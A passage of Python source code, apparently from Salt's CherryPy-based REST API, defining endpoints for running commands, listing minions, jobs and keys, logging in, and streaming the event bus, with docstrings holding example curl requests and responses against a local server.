cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], []).copy()
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for eauth %r, and user %r.",
token.get("eauth"),
token.get("name"),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`.
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`. Otherwise, this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n"
while True:
data = next(stream)
yield "tag: {}\n".format(data.get("tag", ""))
yield "data: {}\n\n".format(salt.utils.json.dumps(data))
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
with salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
opts=self.opts,
listen=True,
) as event:
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(salt.utils.json.dumps(data)),
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
